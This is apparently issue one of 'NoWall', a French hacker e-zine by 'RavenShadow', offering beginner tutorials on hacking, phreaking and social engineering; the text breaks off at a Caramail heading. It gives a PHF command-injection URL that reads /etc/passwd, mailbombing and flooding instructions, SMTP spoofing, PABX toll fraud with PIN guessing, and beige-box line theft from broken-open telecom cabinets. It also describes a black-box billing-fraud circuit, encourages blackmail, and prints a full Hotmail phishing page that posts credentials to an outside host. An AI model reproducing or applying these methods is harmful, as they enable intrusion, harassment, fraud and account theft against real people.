° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °
° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °
° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° 

      ___      __    ________    __            __    __________    __          __ 
     |   \    |  |  |        |  |  |          |  |  |          |  |  |        |  |
     |    \   |  |  |   __   |  |  |          |  |  |   ____   |  |  |        |  |
     |     \  |  |  |  |  |  |  |  |          |  |  |  |    |  |  |  |        |  |
     |  |\  \ |  |  |  |  |  |  |  |          |  |  |  |____|  |  |  |        |  |
     |  | \  \|  |  |  |  |  |  |  |    __    |  |  |          |  |  |        |  |
     |  |  \     |  |  |  |  |  |  \   /  \   /  |  |   ____   |  |  |        |  |
     |  |   \    |  |  |__|  |   \  \_/    \_/  /   |  |    |  |  |  |_____   |  |_____ 
     |  |    \   |  |        |    \     /\     /    |  |    |  |  |        |  |        |
     |__|     \__|  |________|     \___/  \___/     |__|    |__|  |________|  |________|


				              ________________
				              \              /
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<  NUMBER ONE  >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>   
  				              /______________\                                      

                                 __________________________
			               \                        /
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<     PAR RAVENSHADOW    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
     				         /________________________\          
                      
                                                                           
                                                                      
   ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °
   ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °
   ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °


                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			          |                               |
                            |    I N T R O D U C T I O N    |
                            |                               |
                            ---------------------------------



	Me voici, me voila ! Tout nouveau, tout beau, je suis jeune, et ça se voit ;o)

	J'écris cet e-zine (je sais : encore un !) pour participer moi-aussi au développement
de la scène UnD3rGr0uNd.fR (LOL), parce que y'a pas de raison que y'en as qui puissent s'amuser
et pas moi, alors moi aussi chuis d'la partie !!! :-D

	 Bon, ben c'est sûr que je suis pas un Mitnick (tant mieux : j'irais pas en tôle :-P) 
et que j'inove pas dans le genre, mais p'tet' que mon zine plaira à certains et que je pourrais
aider quelques newbies dans leur apprentissage et devenir ainsi un WarLord adulé et respecté...

	Naaannn !!! J'déconne !!! J'veux être monsieur le professeur qui a des élèves qui lui
doivent respect et obéissance, mais quand je débutais, c'était rare que je trouve des gars qui
acceptent de m'aider et de m'apprendre quelque chose, alors j'étais bien content de trouver des
e-zines où je pouvais apprendre des trucs, bien que beaucoup soient trop compliqués pour le 
petit newbie assoiffé de connaissances que j'étais ;-P

	Donc moi, j'ai décidé d'écrire cet e-zine en commençant par la base basique afin d'aider
les débutants qui débutent... J'ai dis une connerie là, non ?

	En clair : je vais commencer très petit et essayer de finir très grand, parce que vaut
mieux ça que l'inverse... Je me trompe ?

	Pour lire pénard ce merveilleux e-zine qu'est NoWall, lisez-le sous WordPad avec une
résolution 800x600 et mettez dans les options : "Pas de retour à la ligne".

	Pour qu'il soit plus facile de trouver l'article que l'on cherche, j'ai divisé mon zine
en plusieurs parties : 

			* Hacking (pour les petits délinquants du Web) 
			* Phreaking (dédicace à Farce Télécon)
			* Social Engineering (ma spécialité à moi que j'adore très beaucoup)
			* Culture (arnaques, histoires, délires, bons plans, etc...)

	Juste à titre d'info, tout ce que je dis est à prendre au 128e degré, parce que je suis
de ceux qui se prennent pas la tête et qui pratiquent l'auto-dérision sans se poser de question,
et si vous êtes cons et que vous pouvez pas comprendre ça, ben c'est dommage pour vous, mais je
tiens à vous signaler que je vous pisse à la raie avec une paille de 50 mètres de long sans
toucher les bords :o)

	Enfin, je dois vous prévenir que mettre en application ce que je décris dans cet e-zine,
ben c'est pô bien ! Et pis si vous vous faîtes prendre, ben c'est pô bien non plus ! Et si vous
me balancez, c'est encore moins bien ! Et pis d'façon, ben si vous me balancez, moi je dirais
que je vous avais dit que c'est pô bien de faire ce que je dis ! Na-na-na-na-nèreuh !

	Allez, je crois que je vais pas m'éterniser 107 ans sur cette intro, parce que j'ai
comme la vague impression que plus j'écris et plus je deviens con ;-D

	Ah ! J'oubliais : vous pouvez m'écrire à RavenShadow@ifrance.com (je vous répondrais
d'ailleurs probablement sous la forme d'un message de vive voix en fichier-joint) ou essayer de 
me choper sur un chat, mais c'est pas gagné d'avance, parce que j'ai la facheuse habitude de 
changer de pseudo comme de caleçon (c'est à dire toutes les 15 jours,... Nan ! J'déconne !) et 
RavenShadow n'est qu'un de mes nicks parmi tant d'autres... 




                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |        S O M M A I R E        |
                            |                               |
                            ---------------------------------


				         ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
				         ¤ SECTION HACKING ¤
				         ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

				        Utiliser un MailBomber
                                Hacker un site par PHF
                                Envoyer un mail anonyme
                                Trouver une adresse IP



				
                                  ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
				          ¤ SECTION PHREAKING ¤
				          ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

                                       Les PABX's
                                     Le Beige-Boxing
                                   Faire une Black-Box




			           ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
			           ¤ SECTION SOCIAL ENGINEERING ¤
			           ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

		              Introduction au Social Engineering
				         Le SE par e-mails
			        Obtenir la pass d'un compte Hotmail
			        Obtenir le pass d'un compte Caramail




				          ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
      				    ¤ SECTION CULTURE ¤
				          ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

                                Historique du Phreaking
                                   Devenir faussaire
                                  L'Anarchie Scolaire




						   ¤¤¤¤¤¤¤¤¤
						   ¤ OUTRO ¤
						   ¤¤¤¤¤¤¤¤¤

					          Greetz
				              Recherches
                               Salutations distinguées




                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |         H A C K I N G         |
                            |                               |
                            ---------------------------------




	******************************
	*** UTILISER UN MAILBOMBER ***
	******************************



	Je vous entend déja beugler : "Wouah ! Le bouffon ! Un article sur l'utilisation des
MailBombers ! Il manquait plus que ça ! Il a dit qu'il commençait bas, mais il avait pas dit 
qu'il commençait sous Terre !!!"... Mais bon, vos critiques, je m'en fous, et moi, vu le nombre
de types qui me demandent comment on utilise ce genre de programmes, ben je sais que ce sera
utile à pas mal de gens (des newbies et des lamers certes, mais des gens quand même). 
	

	*** C'est quoi un MailBomber ? ***

	C'est un programme qui ne sert en fait qu'à emmerder les gens (mais si quelqu'un vous 
fait chier, faut pas vous gêner) en leur envoyant plein de mails à la fois (de 1 à autant qu'on
veut) avec le nom qu'on veut.


	*** Que faut-il mettre dans les cases ? ***

	En ce qui me concerne, le logiciel de MailBombing le plus simple d'utilisation que je
connaisse est QuickFyre, sans oublier qu'il est très efficace...
	Donc vous l'ouvrez et vous remplissez les cases comme suit :

   Target : l'adresse e-mail de votre cible (ex : grosnaze@wanadoo.fr)          
   Sender : votre pseudo ou l'adresse e-mail de celui à qui vous voulez faire accuser
   Subject : le sujet de votre (ou plutot vos) e-mail (ex : Gros con !)
   Server : le serveur que vous voulez utiliser (ex : smtp.wanadoo.fr)
   Copies : le nombre de copies que vous voulez envoyer

	Vous mettez un petit mot dans la grande case, si jamais votre cible ouvre l'un des 
mails, et vous cliquez sur "Mail", et c'est parti !

	Sinon, vous pouvez aussi utiliser un logiciel comme Kaboom!3 : vous l'ouvrez, vous 
cliquez sur "Mailbomber" et vous mettez :

   To : l'adresse e-mail de la cible
   From : votre pseudo ou l'adresse e-mail de celui à qui vous voulez faire accuser
   Server : le serveur que vous voulez utiliser
   Priority : "High" (c'est le meilleur choix)
   Subject : le sujet de votre (ou plutot vos) e-mail 
   Message Body : un petit mot si jamais votre cible ouvre l'un des mails


	Maintenant, vous mettez le nombre de messages que vous voulez envoyer à votre cible ou 
cliquez sur "Mail Perpetually" pour envoyer des messages pendant tout votre temps de connection,
et cliquez sur "Send", et le tour est joué !!!

	
	*** Quelques conseils et remarques ***

	Si vous voulez vraiment faire chier quelqu'un, il faut mailbomber son adresse provider,
comme ça, si votre cible n'a pas de logiciel comme EreMove, elle est obligée de télécharger les
mails un par un.
	Maintenant, si vous voulez faire péter la messagerie de quelqu'un et que vous ne
connaissez qu'une de ses adresses sur un remaileur anonyme (du genre Caramail), renseignez-vous
sur la capacité individuelle de chaque boîte, et agissez en conséquence.
	Par exemple, sur Caramerde, on a le droit d'utiliser 10 Mo par boîte, donc sachant que 
chaque mail fera un Ko, envoyez-en au moins 1500, histoire d'être sûr que la boîte est bel et 
bien niquée.
	Si vous voulez vous assurer de la capacité réelle de chaque boîte (en général, le 
remaileur accorde plus de place qu'il ne l'indique), ouvrez en une à cet effet et mailbombez-la.
	Enfin, si vous voulez vraiment faire quelque chose de bien, organisez une grande soirée
de mailbombing avec une cible prédéfinie comme MiKro$oft ou le F-Haine et explosez tout ça à
plusieurs ; ainsi, votre "force de frappe" sera décuplée et le serveur-cible ne pourra pas 
gérer tout les mails reçus et sera complètement naze jusqu'à que les admins remettent tout ça en
place, ce qui mettra, si l'attaque est assez puissante, au moins une bonne quinzaine de jours.





	******************************
	*** HACKER UN SITE PAR PHF ***
	******************************



	Cette technique est la technique la plus simple pour obtenir un fichier mot de passe, 
mais elle ne marche plus dans 99 % des cas, parce que les admins, moins cons qu'on ne pourrait
croire (mais bien attaqués quand même :-P) ont installés une protection contre ce genre
d'attaque.

	Bon, alors c'est très simple, il suffit de taper ce qui suit dans la barre de votre 
navigateur : 

	http://la_page_web/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

	Juste pour les neuneux : il faut remplacer "la_page_web" par le nom de domaine de celle 
que vous voulez pirater.

	Par exemple, si vous essayer de pirater Dromadaire, vous devez taper :

http://www.dromadaire.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

	Si ça ne marche pas (ce qui sera souvent le cas) il vous faudra enregistrer le fichier 
et le décrypter avec un décodeur de passwords UNIX, dans le genre de MacCrac. 





	*******************************
	*** ENVOYER UN MAIL ANONYME ***
	*******************************


	Envoyer un mail anonyme, c'est hyper simple, mais ça amuse pas mal de monde (y compris
moi, faut pas se mentir).

	Bon, alors la technique qui suit est la technique la plus connue, mais après, je vous
donnerai une technique bien plus simple mais tout aussi efficace. 

	Quoi t'es pas content ? Tu veux la technique la plus simple tout de suite ? Tu veux que
je te casse la gueule petit con ?
	
	Bon, allez, ferme ta gueule que je t'explique !

	En fait, le truc consiste à se connecter sur le port 25 d'un serveur SMTP (Simple Mail 
Transfer Protocol), via Telnet, ce qui ne devrait pas être trop dur, même pour toi, petit newbie.

	Tout d'abord, connecte-toi à Telnet en allant sur DOS, et en tapant avec tes petits 
doigts sur les petites touches de ton petit clavier (mais pas trop fort quand même) :

C:\Windows\telnet.exe

	Ensuite essaye (si par miracle tu as réussi l'opération précédente) de te connecter à un 
serveur en tapant (en contrôlant toujours la force de tes puissants muscles) :

smtp.serveur.com
ou
www.serveur.com

	Commence par essayer les providers, et quand t'auras une réponse, ce sera tout bon (si 
t'es arrivé jusque-là, je te félicite, tu es passé au stade de newbie supérieur ! BRAVO !).

	Enfin ! Tu as réussi à te connecter à un serveur ! La vache ! Un vrai rebelz de 
l'informatique ! J'aurais jamais cru que t'étais si balèze !!! Bon, arrête de jouir et connecte 
bien tes deux seuls petits neurones ; voilà ce qui va se passer (avec une * devant, c'est ce que
tu dois taper, et avec un ¤ devant, c'est ce que tu obtiens) :

	Admettons que tu te sois connecté à Club-Internet :

¤ 220 club-internet.fr ESMTP Sendmail 8.8.8/[France Telecom Interactive]; Mon, 26 Jul 1999

* helo club-internet.fr

¤ 250 club-internet.fr Hello 98AA25C1.ipt.aol.com [132.124.59.119], pleased to meet you

* mail from : seketuveu1@seketuveu2.com (ou juste seketuveu1)

¤ 250 seketamihaseketuveu1@seketamihaseketuveu2.com... Sender ok

* rcpt to : cible@providerdelacible.fr

¤ 250 victime@club-internet.fr... Recipient ok

* data

¤ 354 Enter mail, end with "." on a line by itself

* Message pour la cible, avec le point final seul sur une ligne.

¤ 250 PAA27633 Message accepted for delivery

* quit

	Et voilà, c'est fait ! Tu as réussi ta mission, petit Mitnick en puissance ! Bientôt, 
même la NSA aura peur de toi !!!

	J'ai tout de même quelques remarques à te faire, jeune Chevalier du Net :

	- Avec le client Telnet de Windows, ce que tu tapes au clavier ne s'affiche pas sur ton
moniteur giga-futuriste en 16 millions de couleurs, alors mets ton client en mode "écho local",
et cette astuce d'3L1T3 dU H4Ck1Ng résoudra ton problème !

	- Dans l'exemple que j'ai eu la gentillesse de te donner (comme ça, maintenant, on est 
potes et t'as plus envie de crasher mon ordi), j'ai envoyé un mail à un type de Club-Internet 
avec Club-Internet, mais si j'avais voulu le faire à partir de wanadoodou, j'aurais eu en guise 
de réponse :

		505 victime@club-internet.fr... Relaying Denied

	Et oui, jeune Jedi de l'Internet ! Certains serveurs refusent d'envoyer des mails à 
d'autres personnes qu'à des abonnés chez eux. Et oui, tout le monde n'est pas dévoué à ton 
bonheur, petit adolescent en manque de sensations fortes !

	- Comme tu l'as peut-être remarqué plus haut grâce à tes puissants globes occulaires 
dernière génération, quand tu tapes "helo", le serveur te marque ton IP ; elle est donc loggée 
(t'excites pas ! Je traduis : ton IP est enregistrée et elle sera visible dans un des bandeaux 
du mail) donc n'écris pas ensuite à ta victime sous ta véritable identité sans t'être déconnecté
puis reconnecté sous peine de te faire griller et de te faire repérer en tant que hacker de la 
mort hypra-dangereux et qui fait peur à tous les services secrets du monde ou spoofe toi tout 
simplement si tu sais ce que c'est que de se spoofer !!!


	Bon, t'es calmé ?

	Alors je vais recommencer à te parler comme à un être humain digne de ce nom et je vais
te livrer la technique la plus simple qui soit pour envoyer un mail anonyme...

	En fait, voyez-vous, cher Barnabé (là, les Barnabé vont être surpris ;-P), il suffit
d'utiliser un MailBomber et de n'envoyer qu'un seul message... Tout con, non ?





	******************************
	*** TROUVER UNE ADRESSE IP ***
	******************************	



	*** C'est quoi une IP ? ***

	C'est la représentation numérique d'une adresse binaire 32 bits. Elle se présente de la
manière suivante : xxx.xxx.xxx.xxx, mais comme c'est du 32 bits elle ne pourra pas dépasser 
255.255.255.255. Elle vous est donnée par votre provider, et elle change à chaque connexion (IP
dynamiques).


	*** A quoi ça sert ? ***

	Ben globalement, ça sert à pouvoir pénétrer dans une machine, parce qu'on arrive à rien
en hacking sans l'IP de la cible, à part des techniques comme le MailBombing.


	*** Comment trouver une IP ? ***

	C'est la question qu'on me pose la plus souvent sur les chats. En fait, tout dépend de
quelle IP on veut trouver, et à qui on a affaire !!!!!

	* Sa propre IP *

	C'est un truc qui peut paraître débile, mais c'est quand même le commencement. Pour 
connaître sa propre IP, on avez deux solutions, sous DOS ou sous Windaube.

	Sous DOS, tapez C:\windows\winipcfg

	Sous Windaube, cliquez sur "Démarrer", puis sur "Exécuter", et tapez winipcfg

	Dans les deux cas, vous verrez un tableau apparaître avec diverses info, dont votre 
fameuse IP.

	* L'IP d'un autre *

	-- Sous IRC --

	Trouver l'IP d'un mec sous IRC, y'a rien de plus simple : tapez, sous IRC, 
/dns pseudodumec

	-- Sous ICQ --

	Il y a deux méthodes, toutes les deux hyper simples :

	° Sous ICQ 98 (seulement cette version), allez dans les infos de la cible, mais là, 
hé-hé, son IP est cachée. AHAHAHAHAH !!! Pour remédier à ce "piti" problème, mettez votre ICQ 
off-line (la fleur rouge) et là, MIRACLE !!! Son IP apparaît !!!

	° Sous les autres versions d'ICQ, démerdez-vous pour trouver un prog qui trouve l'IP 
avec le numéro ICQ de la cible. Mon préféré est ICQIPsniffer.

	-- En se faisant nuker -- 

	Cette technique est GIGA-MARRANTE mais il vous faut un prog anti-nuke ou un firewall.

	En fait, le truc, c'est de vous faire passer pour un gros crétin ravagé et de donner 
votre propre IP au premier blaireau de lamer qui vous tombera sous la main. Ce débile ne 
résistera pas à la tentation de vous nuker (forcément, pour une fois qu'il peut mettre sa 
grande science du hack que tout le monde lui envie en application), et grâce à votre anti-nuke 
ou votre firewall, rien n'arrivera à votre P.C hormis l'IP du lamer.

	* IP d'un site *

	Ce truc est carrément hyper facile ; sous DOS tapez ping -a Adresseduserveur.

	Vous aurez alors son IP et la vitesse avec laquelle vous communiquez avec ce site.





                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |       P H R E A K I N G       |
                            |                               |
                            ---------------------------------




	******************
	*** LES PABX'S ***
	******************



	*** Qu'est-ce qu'une PABX ? ***

	C'est un central téléphonique qui gère les appels entrant et sortant à l'intérieur d'une 
entreprise.


	*** Comment trouver un numéro de PABX ***

	Tout d'abord, il faut savoir que la plupart des numéros de PABX commencent par 0800.

	Ensuite, afin d'être faciles à mémoriser, les chiffres qui suivent le 0800 dans un 
numéro de PABX sont construits selon un schéma, comme par exemple :

0800 ABC ABC (exemples : 0800 650 650, 0800 123 123, etc...)
0800 AB AC AD (exemples : 0800 01 02 03, 0800 65 66 67, etc...)
0800 AB AB AB (exemples : 0800 10 10 10, 0800 55 55 55, etc...)
0800 AB BC CD (exemples : 0800 12 23 34, 0800 98 87 76, etc...)
0800 ABC ABD (exemples : 0800 560 561, 0800 788 789, etc...)

	Des programmes comme Toneloc qui scannent automatiquement les PABX, ce qui évite de se 
faire chier à le faire à la main ; sinon, ben il faut de la patience... ou de la chance ! 


	*** Comment savoir si vous avez trouver une PABX ***

	Bon, admettons que vous ayez trouver un numéro qui débouche quelque part, ce ne sera 
pas forcément une PABX, mais si vous tombez sur un voix électronique qui vous demande d'appuyer 
sur "*" ou "#" puis vous demande un mot de passe, il y a de fortes chances que vous ayez 
décroché le gros lot.


	*** Comment trouver le mot de passe ***

	Bon, ben ça, c'est un peu au petit bonheur la chance, mais il faut savoir qu'un mot de 
passe sur un serveur de type PABX est généralement un code de 4 chiffres et qu'il y a toujours
un naze quelque part pour avoir un mot de passe facile à trouver genre :

AAAA --> 0000, 1111, 2222, 3333, etc...
AABB --> 0011, 1122, 5588, 7733, etc...
ABBA --> 0110, 1001, 2552, 9779, etc...
ABCD (dans un ordre chronologique) --> 1234, 3456, 6789, 4567, etc...

	Si ça marche pas, essayez des trucs un peu plus délires du genre 1664, 0666, 0069, etc.

	Et si ça marche toujours pas, ben démerdez-vous ou trouvez une autre PABX :-P


	*** Comment se servir d'une PABX ***

	Vous avez une PABX et un mot de passe qui va avec ? Et vous savez pas quoi en faire ? 
Z'êtes neuneu ou vous vous foutez de ma gueule ??? Bon, ben voila une petite explication du 
monde d'aventures aux mille embûches dans lequel vous allez entrer...

	Bon, avec @ devant, c'est ce que vous faîtes et avec ¤ devant, c'est la réponse que le 
serveur vocal vous donnera... Au fait, ce n'est qu'un exemple (Quoi ? Vous le saviez ? Ah bon ? 
Pardon... ;-P)

@ 0800 666 666

¤ "Bienvenue sur le service Duschmutz, Dugland, Ducon & Cie, gnagnagna gnagnagna..."

@ # ou *

¤ "Gnagnagna gnagnagna..., veuillez composer votre mot de passe."

@ 1664# ou 1664*

¤ "Gnagnagna gnagnagna..., veuillez composer votre numéro de poste."

@ 1664# ou 1664* [on s'en fout du numéro de poste, mettez 4 chiffres et basta !]

¤ "Bienvenue Glandu Number One, gnagnagna gnagnagna, composez le numéro de téléphone de votre 
correspondant précédé d'un zéro et suivi de la touche dièse."

@ 0 666 1664 666 # 

	
	Et voila !!! Le tour est joué ! P4bX 1s Own3d ;-P 

	Amusez-vous bien !!!





	***********************
	*** LE BEIGE-BOXING ***
	***********************



	*** C'est quoi le Beige Boxing ? ***

	Globalement, le Beige Boxing consiste à se brancher sur la ligne téléphonique de 
quelqu'un d'autre pour qu'il banque à notre place. ;-P 


	*** Quel matériel faut-il pour faire du Beige Boxing ? ***

	Bon, ben ça, ça dépend de vous ; mais à la base, il vous faut :

		° 4 pinces crocodiles

		° du matériel de soudure (de l'étain et un fer)

		° un téléphone normal ou un modem
	
		° un cutter ou une pince à dénuder


	Maintenant, vous pouvez aussi avoir besoin d'une barre à mine, d'un tournevis, 
de dynamite, etc...

	Et si vous comptez phreaker pendant longtemps, ben je vous conseille d'emmener de la 
bouffe, de la boisson, du bedo, etc...


	*** Comment procéder ? ***

	Tout d'abord, coupez le fil au ras de la prise mâle du modem ou du téléphone (selon que 
vous vouliez surfer ou téléphoner) ; normalement, 4 fils devraient apparaître : un jaune, un 
vert, un rouge et un blanc. Si ce n'est pas le cas, il vous faudra chercher les équivalences.

	Une fois la première opération faite, dénudez les fils à l'aide du cutter et soudez les 
chacun à une prise crocodile.

	Maintenant, barrez-vous le plus loin possible de la civilisation (en campagne, on a 
moins de chances de se faire niquer et de se faire tracer) et cherchez une borne Fric Télécon 
ou une pylone avec une boîte et défoncez ladite borne ou ledit pylone et vous allez trouver 
plein de trucs dedans, donc 4 fils jaune, vert, rouge et blanc. ;o)

	Donc là, vous reliez le fil jaune de votre téléphone ou de votre modem au fil jaune de 
la borne, et faites pareil avec le vert, le rouge et le blanc, en faisant toujours correspondre 
les couleurs ; vous devriez alors entendre une tonalité dans votre téléphone.

	Maintenant, vous pouvez téléphoner, surfer sur Internet ou encore écouter la ligne 
téléphonique de ceux à qui la ligne appartient. Kewl, non ?


	*** Quelques conseils ***

	Ben tout d'abord, juste par respect de l'éthique, préférez vous brancher sur des lignes 
d'entreprises plutot que des lignes de particuliers, sauf, bien entendu, si le particulier en 
question est vraiment un gros connard qui vous a fait des crasses... ;-P
	Remarquez, je dis ça et je ne dis rien, parce que si vous pompez la ligne d'un 
particulier, il suffit qu'il porte plainte pour se faire rembourser, mais bon... 
	A vous de voir !

	Ensuite, vérifiez bien la solidité de vos branchements, parce que ce serait quand même 
dommage si tout partait en couilles au dernier moment ou en pleine discussion.

	Vous pouvez pomper sur la ligne comme un malade tant que votre généreux donateur 
(Narf !) n'a pas reçu la facture, parce qu'après, vous avez intérêt à laisser au moins une 
période de deux factures (entre 2 et 4 mois suivant les cas) avant de recommencer... Mais 
recommencez quand même !!! ;-D 





	***************************
	*** FAIRE UNE BLACK-BOX ***
	***************************



	*** C'est quoi une Black-Box ? ***

	Ben en résumant, c'est un montage à faire sur un téléphone qui fait que lorsque 
quelqu'un appelle, il ne paye absolument rien, parce que Fuck Telecom croit que le téléphone 
n'est pas décroché.


	*** Et ça ressemble à quoi, une Black-Box ? ***

	Bon, ben je crois qu'un petit schéma s'impose...

____ | = fil électrique
XX     = résistance
%%     = LED
OOO    = interrupteur

NB : les deux fils sont regroupés dans celui du téléphone.


 Ligne           { >--------------Fil-Bleu-----------------------> } Téléphone
 téléphonique	        >------------ --Fil-Blanc---->
                                    | |
                            |_____XX____%%___|
                                    | |
                            |_______OOO_______|


	Remarque : sur certains téléphones, les fils peuvent être rouge et vert, dans ce cas 
il faut remplacer le fil blanc par le fil rouge et le fil bleu par le fil vert.


	*** Comment on la construit la Black-Box ? ***


	Tout d'abord, il faut découper le fil de son téléphone sans le couper en n'ouvrant que 
le pastique qui englobe les deux fils, de facon à avoir devant les yeux que les deux fils en 
question.

	Ensuite, il faut prendre le fil blanc, car c'est sur celui-ci qu'on fait le montage, 
qui est un branchement en parallèle.

	Maintenant, allez chercher votre caisse à outils et vos composants et débrouillez-vous 
comme un grand !


	*** Comment on fait quand le téléphone sonne ? ***

	C'est simple : quand le téléphone sonne, mettez l'interrupteur sur "On", puis décrochez. 
Ainsi, FT croira que vous n'avez toujours pas décroché, alors que vous serez pénard au tel en 
train de vous tapez la discut' !

	Sinon, quand vous laissez sur "Off", ben c'est exactement comme un téléphone normal.

	Voili-voila !!! Bon phreak ! Mais je vous rappelle : faites hyper gaffe, parce que si FT 
vous nique, c'est un procès au cul, et vous êtes sur de le perdre et de vous tapez une putain de
belle amende, parce que vous paierez aussi pour tous ceux qui se font pas prendre !!!!

	Et restez pas trop longtemps non plus, parce que c'est le meilleur moyen de vous faire
choper justement (ben voui, un gars qui attend alors que personne ne répond au bout de 300
sonneries, ça fait un peu chelou quand même). 





                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			          |                               |
                            |      SOCIAL ENGINEERING       |
                            |                               |
                            ---------------------------------



	******************************************
	*** INTRODUCTION AU SOCIAL ENGINEERING ***
	******************************************



	Le Social Engineering (SE), ou Génie Social est un art qui sert à obtenir des 
informations, non pas en utilisant les failles informatiques d'un ordinateur comme en hacking,
mais en utilisant les failles psychologiques d'une personne (bêtise, naïveté, frustration, etc) 
et en usurpant l'identité de quelqu'un ou en opérant carrément sous IF (Identité Fausse, ce qui 
signifie que vous choisissez un nom au pif sans même vous soucier de savoir si quelqu'un porte 
ce nom).

	En clair pour les débiles légers : le SE consiste à duper quelqu'un afin d'obtenir des
informations comme son mot de passe ou son numéro de carte bancaire. 

	En ce qui me concerne, je pense que le SE est tout un art et c'est d'ailleurs ma 
discipline préférée dans le domaine UnderGround, parce que, premièrement, c'est une des
techniques les plus excitantes (Va-t-on réussir à garder son sérieux ? Va-t-on être assez
crédible ?) et les plus drôles (Y'a des gens tellement cons ou tellement manipulable que ça en 
devient marrant), et deuxièmement, parce que c'est fou le nombre d'info qu'on peut obtenir grâce
au SE.

	Il existe plusieurs "supports" pour pratiquer le SE : le téléphone, les e-mails, la
poste et le visu. 

	Dans ce numéro de NoWall, je vais juste aborder le SE via Internet, donc par e-mails, et
au fur et à mesure des numéros, je développerai les différents aspects et les différentes 
techniques pour parvenir à ses fins.

	Ah ! J'oubliais : le SE est absolument illégal, et vous pouvez être condamné pour 
usurpation d'identité, abus de confiance, abus de biens sociaux, et j'en passe ! L'amende sera 
d'un minimum de 200 000 F, plus le remboursement des sommes escroquées, plus, parfois, des 
dommages et intérêts.





	*************************
	*** LE SE PAR E-MAILS ***
	*************************



	Le SE par e-mails sert en général à obtenir les mots de passe d'utilisateurs en se 
faisant passer pour un administrateur du serveur visé.
	La chose la plus importante pour qu'une attaque de ce type réussisse est que la prose
et l'orthographe soient soignés, parce qu'on n'a encore jamais vu d'admin qui ékri kom çoa !
	Mon avis, dans le cas du SE par mails c'est qu'il suffit d'obtenir le pass de la 
messagerie de la cible, afin de pouvoir lire ses mails, ainsi, on peut apprendre un tas de 
trucs sur elle (comme ça, on peut la faire chanter si un jour elle nous menace ou qu'on veut
obtenir quelque chose d'elle), et, en général, le pass de la messagerie est le même que le pass
du site, donc le SE est une forme de hacking.
	Enfin, il y a un truc à ne pas oublier avec ce genre d'attaque au génie social : plus 
vos cibles seront nombreuses, donc plus vous enverrez de requêtes de pass, plus vous obtiendrez 
de réponses.





	*******************************************
	*** OBTENIR LE PASS D'UN COMPTE HOTMAIL ***
	*******************************************



	Bon, ben ça, c'est un truc hyper connu que Clad Strife à créé.
	Il suffit d'envoyer le code-source ci dessous au format HTML en remplaçant le 
"SOCIALENGINEERING@BECOOL.COM" par une adresse e-mail anodine où vous récupérerez les pass.

	Voici le source à envoyer :

<html><head></head> 
      <body bgcolor="#ffffff" link="#000099" vlink="#000099"> 
      <table border=0 cellpadding=5 cellspacing=5 width=508 height=90%> 
      <tr valign=middle><th colspan=2> 
      <font face="Arial, Helvetica" size="5">We're Sorry, We Cannot<br> 
      Process Your Request</font> 
      </th></tr> 
      <tr valign=middle><td align=center> 
      <font face="Arial, Helvetica" size="3">Reason:&nbsp;</font> 
      <font face="Arial, Helvetica" size="3" color="#ff0000"><b>Time expired for your account. 
Please re-login.</b></font><br> 
      </td></tr> 
<tr valign="middle"><td align="center"> 
      <FORM METHOD="POST" NAME="hotmail" 
      ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi" 
target="_parent"> 
      
<INPUT TYPE="hidden" NAME="recipient" VALUE="SOCIALENGINEERING@BECOOL.COM"> 

      <INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password"> 
      <INPUT TYPE="hidden" NAME="return_link_url" 
VALUE="http://www.hotmail.com/cgi-bin/start/"> 
      <table cellpadding="0" cellspacing="5" border="0"> 
      <tr><td><font face="Arial, Helvetica" size="2">Login 
Name:</font><br><input 
      type="text" name="login" size="16" maxlength="16"></td><td><font 
face="Arial, 
      Helvetica" size="2">Password:</font><br><input type="password" 
name="passwd" 
      size="16" maxlength="16">&nbsp;<input type="submit" 
value="Enter"></td><tr> 
      </table></FORM></td></tr> 
      <tr valign=middle><th colspan=2 align=center> 
      <font face="Arial, Helvetica" size="3">Return to <a 
      href="http://www.hotmail.com" 
target="_parent">Hotmail's Homepage</a>. 
      </font></th></tr></table> 
<font size=2 color=black>1996-2000. Hotmail© all rights reserved.</font>





	********************************************
	*** OBTENIR LE PASS D'UN COMPTE CARAMAIL ***
